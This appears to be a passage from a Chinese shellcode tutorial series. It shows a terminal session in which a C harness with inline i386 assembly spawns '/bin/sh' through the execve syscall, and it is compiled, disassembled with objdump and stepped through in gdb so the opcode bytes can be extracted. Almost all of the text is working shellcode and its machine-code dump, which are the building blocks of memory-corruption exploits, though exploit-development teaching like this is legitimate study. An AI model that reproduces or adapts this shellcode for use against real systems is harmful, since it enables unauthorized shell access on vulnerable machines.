root@linux:~/pentest# cat shellcode_asm.c
#include <stdio.h>
/*
 * Demo harness that executes a hand-written i386 Linux execve("/bin/sh")
 * instruction sequence from inline GAS assembly (AT&T syntax).
 *
 * Flow as written in the asm string:
 *   jmp subroutine_call -> call subroutine pushes the address of the
 *   ".string" that follows the call; popl %esi recovers it (esi = &"/bin/sh").
 *   The stores at 0x7(%esi), 0x8(%esi), 0xc(%esi) then build, directly after
 *   the 8-byte "/bin/sh\0", the NUL terminator, argv[0] = esi and
 *   argv[1] = NULL. These offsets are tied to that exact string length;
 *   changing the string silently breaks them.
 *   ebx = path, ecx = &argv (esi+8), edx = &envp (esi+0xc, the NULL just
 *   stored), eax = 0xb (execve) before the first int 0x80. The second
 *   int 0x80 with eax = 1, ebx = 0 is exit(0), reached only if execve fails.
 *
 * Caveats:
 *   - The string and the argv slots live inside .text (the objdump shows
 *     "/bin/sh" at 0x80483bd, in main), so the three stores write into the
 *     code segment. Where text pages are mapped read-only these stores fault
 *     with SIGSEGV before any syscall; the harness only runs as-is on a build
 *     whose text segment is writable.
 *   - "{1}" in the asm string is an extraction artifact for "$0": the
 *     objdump bytes b0 0b and cd 80 encode mov $0xb,%al and int $0x80.
 *   - argc/argv are unused; the asm clobbers eax, ebx, ecx, edx, esi (esi is
 *     callee-saved in the i386 ABI and is not restored, which does not matter
 *     here only because control never returns to C).
 */
int main(int argc, char **argv) {
__asm__
(" \
jmp subroutine_call; \
subroutine: \
popl %esi; \
movl %esi,0x8(%esi); \
xorl %eax,%eax; \
movl %eax,0xc(%esi); \
movb %al,0x7(%esi); \
movb {1}xb,%al; \
movl %esi,%ebx; \
leal 0x8(%esi),%ecx; \
leal 0xc(%esi),%edx; \
int {1}x80; \
xorl %ebx,%ebx; \
movl %ebx,%eax; \
inc %eax; \
int {1}x80; \
subroutine_call: \
call subroutine; \
.string \"/bin/sh\"; \
");
return 0; /* not reached: execve replaces the process image, otherwise exit(0) above terminates */
}
root@linux:~/pentest# gcc -g -o shellcode_asm shellcode_asm.c
root@linux:~/pentest# objdump -d shellcode_asm
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: eb 1f jmp 80483b8 <subroutine_call>
08048399 <subroutine>:
8048399: 5e pop %esi
804839a: 89 76 08 mov %esi,0x8(%esi)
804839d: 31 c0 xor %eax,%eax
804839f: 89 46 0c mov %eax,0xc(%esi)
80483a2: 88 46 07 mov %al,0x7(%esi)
80483a5: b0 0b mov $0xb,%al
80483a7: 89 f3 mov %esi,%ebx
80483a9: 8d 4e 08 lea 0x8(%esi),%ecx
80483ac: 8d 56 0c lea 0xc(%esi),%edx
80483af: cd 80 int $0x80
80483b1: 31 db xor %ebx,%ebx
80483b3: 89 d8 mov %ebx,%eax
80483b5: 40 inc %eax
80483b6: cd 80 int $0x80
080483b8 <subroutine_call>:
80483b8: e8 dc ff ff ff call 8048399 <subroutine>
80483bd: 2f das
80483be: 62 69 6e bound %ebp,0x6e(%ecx)
80483c1: 2f das
80483c2: 73 68 jae 804842c <__libc_csu_init+0x5c>
80483c4: 00 b8 00 00 00 00 add %bh,0x0(%eax)
80483ca: 5d pop %ebp
80483cb: c3 ret
80483cc: 90 nop
80483cd: 90 nop
80483ce: 90 nop
80483cf: 90 nop
root@linux:~/pentest# gdb shellcode_asm
(gdb) b main
Breakpoint 1 at 0x8048397: file shellcode_asm.c, line 5.
(gdb) r
Starting program: /root/pentest/shellcode_asm
Breakpoint 1, main (argc=1, argv=0xbffff464) at shellcode_asm.c:5
5 __asm__
(gdb) disass main
Dump of assembler code for function main:
0x08048394 <+0>: push %ebp
0x08048395 <+1>: mov %esp,%ebp
=> 0x08048397 <+3>: jmp 0x80483b8 <subroutine_call>
0x08048399 <+5>: pop %esi
0x0804839a <+6>: mov %esi,0x8(%esi)
0x0804839d <+9>: xor %eax,%eax
0x0804839f <+11>: mov %eax,0xc(%esi)
0x080483a2 <+14>: mov %al,0x7(%esi)
0x080483a5 <+17>: mov $0xb,%al
0x080483a7 <+19>: mov %esi,%ebx
0x080483a9 <+21>: lea 0x8(%esi),%ecx
0x080483ac <+24>: lea 0xc(%esi),%edx
0x080483af <+27>: int $0x80
0x080483b1 <+29>: xor %ebx,%ebx
0x080483b3 <+31>: mov %ebx,%eax
0x080483b5 <+33>: inc %eax
0x080483b6 <+34>: int $0x80
0x080483b8 <+0>: call 0x8048399 <main+5>
0x080483bd <+5>: das
0x080483be <+6>: bound %ebp,0x6e(%ecx)
0x080483c1 <+9>: das
0x080483c2 <+10>: jae 0x804842c
0x080483c4 <+12>: add %bh,0x0(%eax)
0x080483ca <+18>: pop %ebp
0x080483cb <+19>: ret
End of assembler dump.
(gdb) x/s 0x080483bd
0x80483bd <subroutine_call+5>: "/bin/sh"
进一步完善shellcode的提取(4)